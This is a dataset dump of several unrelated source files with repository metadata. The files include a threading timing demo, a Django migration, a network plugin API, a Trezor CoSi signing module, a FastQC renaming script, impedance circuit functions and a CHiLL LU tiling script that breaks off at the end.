第4章/program/Chapter_4_compare.py
|
kingname/SourceCodeOfBook
|
ab7275108994dca564905818b678bbd2f771c18e
|
[
"MIT"
] | 274
|
2018-10-01T11:07:25.000Z
|
2022-03-17T13:48:45.000Z
|
第4章/program/Chapter_4_compare.py
|
kingname/SourceCodeOfBook
|
ab7275108994dca564905818b678bbd2f771c18e
|
[
"MIT"
] | 6
|
2019-02-28T14:18:21.000Z
|
2022-03-02T14:57:39.000Z
|
第4章/program/Chapter_4_compare.py
|
kingname/SourceCodeOfBook
|
ab7275108994dca564905818b678bbd2f771c18e
|
[
"MIT"
] | 110
|
2018-10-16T06:08:37.000Z
|
2022-03-16T08:19:29.000Z
|
import requests
import time
from multiprocessing.dummy import Pool
def query(url):
requests.get(url)
start = time.time()
for i in range(100):
query('https://baidu.com')
end = time.time()
print(f'单线程循环访问100次百度,耗时:{end - start}')
start = time.time()
url_list = []
for i in range(100):
url_list.append('https://baidu.com')
pool = Pool(5)
pool.map(query, url_list)
end = time.time()
print(f'5线程访问100次百度,耗时:{end - start}')
| 18.125
| 40
| 0.682759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 152
| 0.313402
|
8bb336feea80faaae86bf909a42bb1e797a4c310
| 702
|
py
|
Python
|
hole/migrations/0008_auto_20210128_1959.py
|
kavinzhao/fduhole
|
508922cfa0558c58b95206dd8fbf51d10525fa1e
|
[
"Apache-2.0"
] | 9
|
2021-04-14T12:08:38.000Z
|
2021-12-16T08:14:40.000Z
|
hole/migrations/0008_auto_20210128_1959.py
|
kavinzhao/fduhole
|
508922cfa0558c58b95206dd8fbf51d10525fa1e
|
[
"Apache-2.0"
] | 9
|
2021-04-18T09:48:25.000Z
|
2021-11-26T07:43:22.000Z
|
hole/migrations/0008_auto_20210128_1959.py
|
kavinzhao/fduhole
|
508922cfa0558c58b95206dd8fbf51d10525fa1e
|
[
"Apache-2.0"
] | 4
|
2021-07-15T02:10:42.000Z
|
2022-01-22T02:12:11.000Z
|
# Generated by Django 3.1.5 on 2021-01-28 11:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hole', '0007_auto_20210126_2138'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='number',
),
migrations.AddField(
model_name='discussion',
name='content',
field=models.TextField(default=None),
preserve_default=False,
),
migrations.AlterField(
model_name='post',
name='date_created',
field=models.DateTimeField(auto_now_add=True, db_index=True),
),
]
| 24.206897
| 73
| 0.566952
| 609
| 0.867521
| 0
| 0
| 0
| 0
| 0
| 0
| 133
| 0.189459
|
8bb369887e18a7fa4f7256d2ff77d3ccf9f84c6a
| 5,607
|
py
|
Python
|
nfv/nfv-vim/nfv_vim/nfvi/api/v1/_nfvi_network_api.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2020-02-07T19:01:36.000Z
|
2022-02-23T01:41:46.000Z
|
nfv/nfv-vim/nfv_vim/nfvi/api/v1/_nfvi_network_api.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 1
|
2021-01-14T12:02:25.000Z
|
2021-01-14T12:02:25.000Z
|
nfv/nfv-vim/nfv_vim/nfvi/api/v1/_nfvi_network_api.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2021-01-13T08:39:21.000Z
|
2022-02-09T00:21:55.000Z
|
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class NFVINetworkAPI(object):
"""
Abstract NFVI Network API Class Definition
"""
@abc.abstractproperty
def name(self):
"""
Returns the name of plugin
"""
pass
@abc.abstractproperty
def version(self):
"""
Returns the version of the plugin
"""
pass
@abc.abstractproperty
def provider(self):
"""
Returns the vendor who created the plugin
"""
pass
@abc.abstractproperty
def signature(self):
"""
Returns the signature of the plugin
"""
pass
@abc.abstractmethod
def get_networks(self, future, paging, callback):
"""
Get a list of networks using the plugin
"""
pass
@abc.abstractmethod
def create_network(self, future, network_name, network_type,
segmentation_id, physical_network, shared, callback):
"""
Create a network using the plugin
"""
pass
@abc.abstractmethod
def update_network(self, future, network_uuid, shared, callback):
"""
Update a network using the plugin
"""
pass
@abc.abstractmethod
def delete_network(self, future, network_uuid, callback):
"""
Delete a network using the plugin
"""
pass
@abc.abstractmethod
def get_network(self, future, network_uuid, callback):
"""
Get a network using the plugin
"""
pass
@abc.abstractmethod
def get_subnets(self, future, paging, callback):
"""
Get a list of subnets using the plugin
"""
pass
@abc.abstractmethod
def create_subnet(self, future, network_uuid, subnet_name, ip_version,
subnet_ip, subnet_prefix, gateway_ip, dhcp_enabled,
callback):
"""
Create a subnet using the plugin
"""
pass
@abc.abstractmethod
def update_subnet(self, future, subnet_uuid, gateway_ip, delete_gateway,
dhcp_enabled, callback):
"""
Update a subnet using the plugin
"""
pass
@abc.abstractmethod
def delete_subnet(self, future, subnet_uuid, callback):
"""
Delete a subnet using the plugin
"""
pass
@abc.abstractmethod
def get_subnet(self, future, subnet_uuid, callback):
"""
Get a subnet using the plugin
"""
pass
@abc.abstractmethod
def notify_host_disabled(self, future, host_uuid, host_name,
host_personality, callback):
"""
Notify network host disabled using the plugin
"""
pass
@abc.abstractmethod
def enable_host_services(self, future, host_uuid, host_name,
host_personality, callback):
"""
Enable network services on a host using the plugin
"""
pass
@abc.abstractmethod
def get_network_agents(self, future, callback):
"""
Get network agent information using the plugin
"""
pass
@abc.abstractmethod
def get_dhcp_agent_networks(self, future, agent_id, callback):
"""
Get networks hosted by a dhcp agent using the plugin
"""
pass
@abc.abstractmethod
def get_agent_routers(self, future, agent_id, callback):
"""
Get network routers on a hosting agent using the plugin
"""
pass
@abc.abstractmethod
def get_router_ports(self, future, router_id, callback):
"""
Get router ports using the plugin
"""
pass
@abc.abstractmethod
def add_network_to_dhcp_agent(self, future, agent_id, network_id, callback):
"""
Add a network to a dhcp agent using the plugin
"""
pass
@abc.abstractmethod
def remove_network_from_dhcp_agent(self, future, agent_id, network_id, callback):
"""
Remove a network from a dhcp agent using the plugin
"""
pass
@abc.abstractmethod
def add_router_to_agent(self, future, agent_id, router_id, callback):
"""
Add a router to an agent using the plugin
"""
pass
@abc.abstractmethod
def remove_router_from_agent(self, future, agent_id, router_id, callback):
"""
Remove router from an agent using the plugin
"""
pass
@abc.abstractmethod
def get_physical_network(self, future, network_id, callback):
"""
Get physical network of a network using the plugin
"""
pass
@abc.abstractmethod
def delete_host_services(self, future, host_uuid, host_name,
host_personality, callback):
"""
Delete network services on a host using the plugin
"""
pass
@abc.abstractmethod
def query_host_services(self, future, host_uuid, host_name,
host_personality, check_fully_up,
callback):
"""
Query network services on a host using the plugin
"""
pass
@abc.abstractmethod
def initialize(self, config_file):
"""
Initialize the plugin
"""
pass
@abc.abstractmethod
def finalize(self):
"""
Finalize the plugin
"""
pass
| 24.809735
| 85
| 0.574817
| 5,455
| 0.972891
| 0
| 0
| 5,487
| 0.978598
| 0
| 0
| 1,962
| 0.34992
|
8bb4b5b36380f83dc59bb259a75e2877488cbe5c
| 750
|
py
|
Python
|
array/max_subarray.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
array/max_subarray.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
array/max_subarray.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
# DP; Time: O(n); Space: O(1)
def max_subarray(nums):
for i in range(1, len(nums)):
if nums[i - 1] > 0:
nums[i] += nums[i - 1]
return max(nums)
# Time: O(n); Space: O(1)
def max_subarray2(nums):
max_sum = nums[0]
curr_sum = nums[0]
for i in range(len(nums)):
if curr_sum + nums[i] > nums[i]:
curr_sum += nums[i]
else:
curr_sum = nums[i]
if curr_sum > max_sum:
max_sum = curr_sum
# curr_sum = max(nums[i], curr_sum + nums[i])
# max_sum = max(max_sum, curr_sum)
return max_sum
# Test cases:
print(max_subarray([-2, 1, -3, 4, -1, 2, 1, -5, 4]) == 6)
print(max_subarray([1]) == 1)
print(max_subarray([5, 4, -1, 7, 8]) == 23)
| 22.058824
| 57
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 146
| 0.194667
|
8bb4f4ea88058eb0410caa3dc14fb32b876055fc
| 4,696
|
py
|
Python
|
python/trezorlib/cosi.py
|
Kayuii/trezor-crypto
|
6556616681a4e2d7e18817e8692d4f6e041dee01
|
[
"MIT"
] | null | null | null |
python/trezorlib/cosi.py
|
Kayuii/trezor-crypto
|
6556616681a4e2d7e18817e8692d4f6e041dee01
|
[
"MIT"
] | 1
|
2019-02-08T00:22:42.000Z
|
2019-02-13T09:41:54.000Z
|
python/trezorlib/cosi.py
|
Kayuii/trezor-crypto
|
6556616681a4e2d7e18817e8692d4f6e041dee01
|
[
"MIT"
] | 2
|
2019-02-07T23:57:09.000Z
|
2020-10-21T07:07:27.000Z
|
# This file is part of the Trezor project.
#
# Copyright (C) 2012-2018 SatoshiLabs and contributors
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License version 3
# as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the License along with this library.
# If not, see <https://www.gnu.org/licenses/lgpl-3.0.html>.
from functools import reduce
from typing import Iterable, List, Tuple
from . import _ed25519, messages
from .tools import expect
# XXX, these could be NewType's, but that would infect users of the cosi module with these types as well.
# Unsure if we want that.
Ed25519PrivateKey = bytes
Ed25519PublicPoint = bytes
Ed25519Signature = bytes
def combine_keys(pks: Iterable[Ed25519PublicPoint]) -> Ed25519PublicPoint:
"""Combine a list of Ed25519 points into a "global" CoSi key."""
P = [_ed25519.decodepoint(pk) for pk in pks]
combine = reduce(_ed25519.edwards_add, P)
return Ed25519PublicPoint(_ed25519.encodepoint(combine))
def combine_sig(
global_R: Ed25519PublicPoint, sigs: Iterable[Ed25519Signature]
) -> Ed25519Signature:
"""Combine a list of signatures into a single CoSi signature."""
S = [_ed25519.decodeint(si) for si in sigs]
s = sum(S) % _ed25519.l
sig = global_R + _ed25519.encodeint(s)
return Ed25519Signature(sig)
def get_nonce(
sk: Ed25519PrivateKey, data: bytes, ctr: int = 0
) -> Tuple[int, Ed25519PublicPoint]:
"""Calculate CoSi nonces for given data.
These differ from Ed25519 deterministic nonces in that there is a counter appended at end.
Returns both the private point `r` and the partial signature `R`.
`r` is returned for performance reasons: :func:`sign_with_privkey`
takes it as its `nonce` argument so that it doesn't repeat the `get_nonce` call.
`R` should be combined with other partial signatures through :func:`combine_keys`
to obtain a "global commitment".
"""
# r = hash(hash(sk)[b .. 2b] + M + ctr)
# R = rB
h = _ed25519.H(sk)
bytesize = _ed25519.b // 8
assert len(h) == bytesize * 2
r = _ed25519.Hint(h[bytesize:] + data + ctr.to_bytes(4, "big"))
R = _ed25519.scalarmult(_ed25519.B, r)
return r, Ed25519PublicPoint(_ed25519.encodepoint(R))
def verify(
signature: Ed25519Signature, digest: bytes, pub_key: Ed25519PublicPoint
) -> None:
"""Verify Ed25519 signature. Raise exception if the signature is invalid."""
# XXX this *might* change to bool function
_ed25519.checkvalid(signature, digest, pub_key)
def verify_m_of_n(
signature: Ed25519Signature,
digest: bytes,
m: int,
n: int,
mask: int,
keys: List[Ed25519PublicPoint],
) -> None:
if m < 1:
raise ValueError("At least 1 signer must be specified")
selected_keys = [keys[i] for i in range(n) if mask & (1 << i)]
if len(selected_keys) < m:
raise ValueError(
"Not enough signers ({} required, {} found)".format(m, len(selected_keys))
)
global_pk = combine_keys(selected_keys)
return verify(signature, digest, global_pk)
def pubkey_from_privkey(privkey: Ed25519PrivateKey) -> Ed25519PublicPoint:
"""Interpret 32 bytes of data as an Ed25519 private key.
Calculate and return the corresponding public key.
"""
return Ed25519PublicPoint(_ed25519.publickey_unsafe(privkey))
def sign_with_privkey(
digest: bytes,
privkey: Ed25519PrivateKey,
global_pubkey: Ed25519PublicPoint,
nonce: int,
global_commit: Ed25519PublicPoint,
) -> Ed25519Signature:
"""Create a CoSi signature of `digest` with the supplied private key.
This function needs to know the global public key and global commitment.
"""
h = _ed25519.H(privkey)
a = _ed25519.decodecoord(h)
S = (nonce + _ed25519.Hint(global_commit + global_pubkey + digest) * a) % _ed25519.l
return Ed25519Signature(_ed25519.encodeint(S))
# ====== Client functions ====== #
@expect(messages.CosiCommitment)
def commit(client, n, data):
return client.call(messages.CosiCommit(address_n=n, data=data))
@expect(messages.CosiSignature)
def sign(client, n, data, global_commitment, global_pubkey):
return client.call(
messages.CosiSign(
address_n=n,
data=data,
global_commitment=global_commitment,
global_pubkey=global_pubkey,
)
)
| 33.784173
| 105
| 0.70379
| 0
| 0
| 0
| 0
| 426
| 0.090716
| 0
| 0
| 1,977
| 0.420997
|
8bb52f491af72661c47a685434d4940a457e1a8b
| 2,881
|
py
|
Python
|
workflow/scripts/modifyFastQC.py
|
StephenRicher/RNA-Flow
|
57890772cb95beb390990618eb02f5d6e138312b
|
[
"MIT"
] | null | null | null |
workflow/scripts/modifyFastQC.py
|
StephenRicher/RNA-Flow
|
57890772cb95beb390990618eb02f5d6e138312b
|
[
"MIT"
] | null | null | null |
workflow/scripts/modifyFastQC.py
|
StephenRicher/RNA-Flow
|
57890772cb95beb390990618eb02f5d6e138312b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
""" Create new FastQC zip directory with a new sample name for multiQC."""
import os
import sys
import logging
import zipfile
import tempfile
import argparse
__version__ = '1.0.0'
def main(zipIn, zipOut, sample, **kwargs):
with tempfile.TemporaryDirectory() as tmpDir:
# Create temporary file path for storing updated 'fastqc_data.txt'
updatedData = os.path.join(tmpDir, 'fastqc_data-updated.txt')
# Copy Zip archive to new location but extract 'fastqc_data.txt'
with zipfile.ZipFile(zipIn, 'r') as zipInfd, zipfile.ZipFile(zipOut, 'w') as zipOutfd:
zipOutfd.comment = zipInfd.comment
for item in zipInfd.infolist():
if item.filename.endswith('fastqc_data.txt'):
# Retrieve archive name for adding back in later.
arcname = item.filename
# Extract data to temporary directory.
originalData = zipInfd.extract(item.filename, tmpDir)
else:
zipOutfd.writestr(item, zipInfd.read(item.filename))
with open(originalData) as originalf, open(updatedData, 'w') as updatef:
for line in originalf:
if line.startswith('Filename'):
header, filename = line.split()
filename = sample
updatef.write(f'{header}\t{filename}\n')
else:
updatef.write(line)
# Add updated data back to the original zip path
with zipfile.ZipFile(zipOut, mode='a', compression=zipfile.ZIP_DEFLATED) as zf:
zf.write(updatedData, arcname)
def parse_arguments():
custom = argparse.ArgumentParser(add_help=False)
custom.set_defaults(function=main)
custom.add_argument(
'zipIn', help='FastQC output zip directory.')
custom.add_argument(
'zipOut', help='Path to updated FastQC zip directory.')
custom.add_argument(
'sample', help='New sample name for multiQC parsing.')
epilog='Stephen Richer, University of Bath, Bath, UK (sr467@bath.ac.uk)'
base = argparse.ArgumentParser(add_help=False)
base.add_argument(
'--version', action='version', version=f'%(prog)s {__version__}')
base.add_argument(
'--verbose', action='store_const', const=logging.DEBUG,
default=logging.INFO, help='verbose logging for debugging')
parser = argparse.ArgumentParser(
epilog=epilog, description=__doc__, parents=[base, custom])
args = parser.parse_args()
log_format='%(asctime)s - %(levelname)s - %(funcName)s - %(message)s'
logging.basicConfig(level=args.verbose, format=log_format)
return args
if __name__ == '__main__':
args = parse_arguments()
return_code = args.function(**vars(args))
logging.shutdown()
sys.exit(return_code)
| 34.710843
| 94
| 0.637279
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 820
| 0.284623
|
8bb63310aa365a92b778a469e0b31fbf329b889f
| 7,711
|
py
|
Python
|
v0/aia_eis_v0/circuits/circuit_pack_01.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | 1
|
2022-03-02T12:57:19.000Z
|
2022-03-02T12:57:19.000Z
|
v0/aia_eis_v0/circuits/circuit_pack_01.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
v0/aia_eis_v0/circuits/circuit_pack_01.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
from circuits.elements import ele_C as C
from circuits.elements import ele_L as L
from circuits.elements import ele_Warburg as WB
from circuits.elements import ele_Q as Q
"""
支惠在原始的几个电路基础上新加了很多简单的单路,之后有空再去合并
"""
"""
Define all the circuits used in this project
Python 电路模型函数名 命名规则:
‘a’ == ‘(’; ‘b’ == ‘)’,直接用字母a替代左括号,用字母b替代右括号
Circuit(ECM) No. CDC Function
0 R(CR) RaCRb, Simplified Randles Cell
0 R0aC0R1b
1 R(QR) RaQRb
1 R(QR) R0aQ0R1b
2 R(QR)(QR) RaQRbaQRb
2 R(QR)(QR) R0aQ0R1baQ1R2b
3 R(QR(LR)) RaQRaLRbb
3 R(QR(LR)) R0aQ0R1aL0R2bb
4 R(Q(RW)) RaQaRWbb
4 R(Q(RW)) R0aQ0aR1W0bb
5 R(QR)(QR)W RaQRbaQRbW
5 R(QR)(QR)W R0aQ0R1baQ1R2bW0
6 R(QR)(Q(RW)) RaQRbaQaRWbb
6 R(QR)(Q(RW)) R0aQ0R1baQ1aR2W0bb
7 R(QR)W RaQRbW
7 R(QR)W R0aQ0R1bW0
8 R(Q(RW))Q RaQaRWbbQ
8 R(Q(RW))Q R0aQ0aR1W0bbQ1
9 R(Q(R(QR))) RaQaRaQRbbb
9 R(Q(R(QR))) R0aQ0aR1aQ1R2bbb
Q_pair = (q, n) or [q, n]
q: CPE coefficient, Constant phase element [s^n/ohm]
n: Constant phase elelment exponent [-]
WB_sigma: warburg coefficient
"""
# ECM-0 R(CR)
# ECM-0 R0(C0R1)
def RaCRb(w, R0, R1, C0):
# RaCRb == R0aC0R1b, Simplified Randles Cell
z = R0 + 1 / (1 / R1 + 1j * w * C0)
return z
# ECM-1 R(QR), already include ECM-0, when n = 1
def RaQRb(w, R0, Q0_pair, R1):
z = R0 + 1 / ((1 / R1) + (1 / Q(w, q = Q0_pair[0], n = Q0_pair[1])))
return z
# ECM-2 R(QR)(QR)
def RaQRbaQRb(w, R0, Q0_pair, R1, Q1_pair, R2):
z = R0 \
+ 1 / ((1 / R1) + (1 / Q(w, q = Q0_pair[0], n = Q0_pair[1])))\
+ 1 / ((1 / R2) + (1 / Q(w, q = Q1_pair[0], n = Q1_pair[1])))
return z
# ECM-3 R(QR(LR))
def RaQRaLRbb(w, R0, Q0_pair, R1, L0, R2):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0], n=Q0_pair[1])) + (1 / R1) + (1 / (L(w, L0) + R2)))
return z
# ECM-4 R(Q(RW))
def RaQaRWbb(w, R0, Q0_pair, R1, W0):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0], n=Q0_pair[1])) + (1 / (R1 + WB(w, sigma=W0))))
return z
# ECM-5 R(QR)(QR)W
def RaQRbaQRbW(w, R0, Q0_pair, R1, Q1_pair, R2, W0):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0], n=Q0_pair[1])) + (1/R1)) \
+ 1 / ((1 / Q(w, q=Q1_pair[0], n=Q1_pair[1])) + (1/R2)) \
+ WB(w, sigma=W0)
return z
# ECM-6 R(QR)(Q(RW))
def RaQRbaQaRWbb(w, R0, Q0_pair, R1, Q1_pair, R2, W0):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0],n =Q0_pair[1])) + (1/R1)) \
+ 1 / ((1 / Q(w, q=Q1_pair[0],n=Q1_pair[1])) + (1/(R2 + WB(w, sigma=W0))))
return z
# ECM-7 R(QR)W
def RaQRbW(w, R0, Q0_pair, R1, W0):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0], n=Q0_pair[1])) + (1/R1)) + WB(w, sigma=W0)
return z
# ECM-8 R(Q(RW))Q
def RaQaRWbbQ(w, R0, Q0_pair, R1, W0, Q1_pair):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0],n=Q0_pair[1])) + (1 / (R1 + WB(w, sigma=W0)))) \
+ Q(w, q=Q1_pair[0], n=Q1_pair[1])
return z
# ECM-9 R(Q(R(QR)))
def RaQaRaQRbbb(w, R0, Q0_pair, R1, Q1_pair, R2):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0], n=Q0_pair[1])) + ( 1 / ( R1 + ( 1 / ( 1/Q(w, q=Q1_pair[0],n=Q1_pair[1]) + 1/R2)))) )
return z
# ------------------ ECMs are not numbered ------------------
# DPFC: ECM-10 R0(C0R1)(C1(R2W0))
def RaCRbaCaRWbb(w, R0, C0, R1, C1, R2, W0):
z = R0 + 1/(1/R1 + 1j * w * C0) + 1 / (1j * w * C1 + 1/(R2 + WB(w, sigma=W0)))
return z
# DPFC: ECM-11 R0(C0R1(R2W0))(Q0R3)
def RaCRaRWbbaQRb(w, R0, C0, R1, R2, W0, Q0_pair, R3):
z = R0 + 1 / (1j * w * C0 + 1/R1 + 1 / (R2 + WB(w, sigma=W0)) ) + 1 / (1 / Q(w, q=Q0_pair[0], n=Q0_pair[1]) + 1/R3)
return z
# ------------------ ECMs are not numbered ------------------
#NEW RULE: ecm_2(two element)_001(Sequence)
#ecm_2_001 R0R1
def RR(R0,R1):
z = R0 + R1
return z
#ecm_2_002 (R0R1)
def aRRb(R0,R1):
z = 1 / (1 / R0 + 1 / R1)
return z
#ecm_2_003 R0L0
def RL(w,R0,L0):
z = R0 + L(w, L0)
return z
#ecm_2_004 (R0L0)
def aRLb(w,R0,L0):
z = 1 / (1 / R0 + 1/(L(w, L0) ))
return z
#ecm_2_005 R0C0
def RC(w, R0, C0):
z = R0 + 1 / 1j * w * C0
return z
#ecm_2_006 (R0C0)
def aRCb(w, R0, C0):
z = 1 / (1 / R0 + 1j * w * C0)
return z
#ecm_3_001 R0R1R2
def RRR(R0,R1,R2):
z = R0 + R1 + R2
return z
#ecm_3_002 R0(R1R2)
def RaRRb(R0,R1,R2):
z = 1 / (1 / R1 + 1 / R2) + R0
return z
#ecm_3_003 (R0R1R2)
def aRRRb(R0,R1,R2):
z = 1 / (1 / R0 + 1 / R1 + 1 / R2)
return z
#ecm_3_004 R0R1L0
def RRL(w, R0,R1,L0):
z = R0 + R1 + L(w, L0)
return z
#ecm_3_005 R0(R1L0)
def RaRLb(w,R0,R1,L0):
z = R0 + 1 / (1 / L(w, L0) + 1 / R1)
return z
#ecm_3_006 (R0R1)L0
def aRRbL(w,R0,R1,L0):
z = 1 / (1 / R0 + 1 / R1) + L(w, L0)
return z
#ecm_3_007 (R0R1L0)
def aRRLb(w,R0,R1,L0):
z = 1 / (1 / R0 + 1 / R1 + 1 / L(w, L0))
return z
#ecm_3_008 R0L0L1
def RLL(w,R0,L0,L1):
z = R0 + L(w, L0) + L(w, L1)
return z
#ecm_3_009 R0(L0L1)
def RaLLb(w,R0,L0,L1):
z = R0 + 1/(1 / L(w, L0) + 1 / L(w, L1))
return z
#ecm_3_010 (R0L0L1)
def aRLLb(w,R0,L0,L1):
z = 1 / (1 / L(w, L0) + 1 / L(w, L1) + 1 / R0)
return z
#ecm_3_011 (R0L0)L1
def aRLbL(w,R0,L0,L1):
z = 1 / (1 / L(w, L0) + 1 / R0) + L(w, L1)
return z
#ecm_3_012 R0R1C0
def RRC(w, R0,R1,C0):
z = R0 + R1 + 1 / 1j * w * C0
return z
#ecm_3_013 (R0R1)C0
def aRRbC(w, R0,R1,C0):
z = 1 / (1 / R0 + 1 / R1) + 1 / 1j * w * C0
return z
#ecm_3_014 R0(R1C0)
def RaRCb(w, R0,R1,C0):
z = 1 / (1 / R1 + 1j * w * C0) + R0
return z
#ecm_3_015 (R0R1C0)
def aRRCb(w, R0,R1,C0):
z = 1 / (1 / R0 + 1 / R1 + 1j * w * C0)
return z
#ecm_3_016 R0C0C1
def RCC(w, R0,C0,C1):
z = R0 + 1 / 1j * w * C1 + 1 / 1j * w * C0
return z
#ecm_3_017 (R0C0)C1
def aRCbC(w, R0,C0,C1):
z = 1 / (1 / R0 + 1j * w * C0) + 1 / 1j * w * C1
return z
#ecm_3_018 R0(C0C1)
def RaCCb(w, R0,C0,C1):
z = R0 + 1 / (1j * w * C0 + 1j * w * C1)
return z
#ecm_3_019 (R0C0C1)
def aRCCb(w, R0,C0,C1):
z = 1 / (1 / R0 + 1j * w * C0 + 1j * w * C1)
return z
#ecm_3_020 R0R1Q0
def RRQ(w, R0,R1,Q0_pair):
z = R0 + R1 + Q(w, q = Q0_pair[0], n = Q0_pair[1])
return z
#ecm_3_021 (R0R1)Q0
def aRRbQ(w, R0, R1, Q0_pair):
z = 1 / (1 / R0 + 1 / R1) + Q(w, q = Q0_pair[0], n = Q0_pair[1])
return z
#ecm_3_022 R0(R1Q0)
def RaRQb(w, R0,R1,Q0_pair):
z = R0 + 1 / (1 / R1 + 1 / Q(w, q = Q0_pair[0], n = Q0_pair[1]))
return z
#ecm_3_023 (R0R1Q0)
def aRRQb(w, R0,R1,Q0_pair):
z = 1 / (1 / R0 + 1 / R1 + 1 / Q(w, q = Q0_pair[0], n = Q0_pair[1]))
return z
#ecm_3_024 RQ0Q1
def RQQ(w, R0,Q0_pair,Q1_pair):
z = R0 + Q(w, q = Q0_pair[0], n = Q0_pair[1]) + Q(w, q = Q1_pair[0], n = Q1_pair[1])
return z
#ecm_3_025 (R0Q0)Q1
def aRQbQ(w, R0, Q0_pair, Q1_pair):
z = 1 / (1 / R0 + 1 / Q(w, q = Q0_pair[0], n = Q0_pair[1])) + Q(w, q = Q1_pair[0], n = Q1_pair[1])
return z
#ecm_3_026 R(Q0Q1)
def RaQQb(w, R0, Q0_pair, Q1_pair):
z = R0 + 1 / (1 / Q(w, q = Q1_pair[0], n = Q1_pair[1]) + 1 / Q(w, q = Q0_pair[0], n = Q0_pair[1]))
return z
#ecm_3_027 CCQ
#ecm_3_028 C(CQ)
#ecm_3_029 (CCQ)
#ecm_3_030 (CC)Q
#ecm_3_031 CQQ
#ecm_3_032 C(QQ)
#ecm_3_033 Q(CQ)
#ecm_3_034 (CQQ)
# ------------------ ECMs are not numbered ------------------
| 26.317406
| 126
| 0.489171
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,877
| 0.366264
|
8bb6d2bd0e69ae1dc3728d097c16522641fbedbf
| 1,155
|
py
|
Python
|
devlib/exception.py
|
BayLibre/devlib
|
efa0ecdfe931caebc9a7dab16bb172b96c3f92cb
|
[
"Apache-2.0"
] | 1
|
2021-06-19T09:32:50.000Z
|
2021-06-19T09:32:50.000Z
|
devlib/exception.py
|
BayLibre/devlib
|
efa0ecdfe931caebc9a7dab16bb172b96c3f92cb
|
[
"Apache-2.0"
] | 1
|
2016-02-08T11:27:34.000Z
|
2016-02-08T11:27:34.000Z
|
devlib/exception.py
|
BayLibre/devlib
|
efa0ecdfe931caebc9a7dab16bb172b96c3f92cb
|
[
"Apache-2.0"
] | 3
|
2015-12-15T11:28:06.000Z
|
2016-03-04T16:36:19.000Z
|
# Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from devlib.utils.misc import TimeoutError # NOQA pylint: disable=W0611
class DevlibError(Exception):
"""Base class for all Workload Automation exceptions."""
pass
class TargetError(DevlibError):
"""An error has occured on the target"""
pass
class TargetNotRespondingError(DevlibError):
"""The target is unresponsive."""
def __init__(self, target):
super(TargetNotRespondingError, self).__init__('Target {} is not responding.'.format(target))
class HostError(DevlibError):
"""An error has occured on the host"""
pass
| 28.170732
| 101
| 0.732468
| 482
| 0.417316
| 0
| 0
| 0
| 0
| 0
| 0
| 796
| 0.689177
|
8bb84845a4e4ca234bb0e7dc0448fc8b70e6253a
| 843
|
py
|
Python
|
chill/examples/chill/testcases/lu.py
|
CompOpt4Apps/Artifact-DataDepSimplify
|
4fa1bf2bda2902fec50a54ee79ae405a554fc9f4
|
[
"MIT"
] | 5
|
2019-05-20T03:35:41.000Z
|
2021-09-16T22:22:13.000Z
|
chill/examples/chill/testcases/lu.py
|
CompOpt4Apps/Artifact-DataDepSimplify
|
4fa1bf2bda2902fec50a54ee79ae405a554fc9f4
|
[
"MIT"
] | null | null | null |
chill/examples/chill/testcases/lu.py
|
CompOpt4Apps/Artifact-DataDepSimplify
|
4fa1bf2bda2902fec50a54ee79ae405a554fc9f4
|
[
"MIT"
] | null | null | null |
# LAPACK optimization strategy for LU factorization.
from chill import *
source('lu.c')
procedure('lu')
loop(0)
TJ = 64
original()
tile(1, 3, TJ, 1)
split(1, 2, 'L1-L2>=2') #t2-t4>=2
permute(3, 2, [2,4,3]) # mini-LU
permute(1, 2, [3,4,2]) # other than mini-LU
split(1, 2, 'L2>=L1-1') # seperate MM by t4 >= t2-1
# now optimize for TRSM
TK1 = 256
TI1 = 256
TJ1 = 8
UI1 = 1
UJ1 = 1
tile(4, 2, TI1, 2)
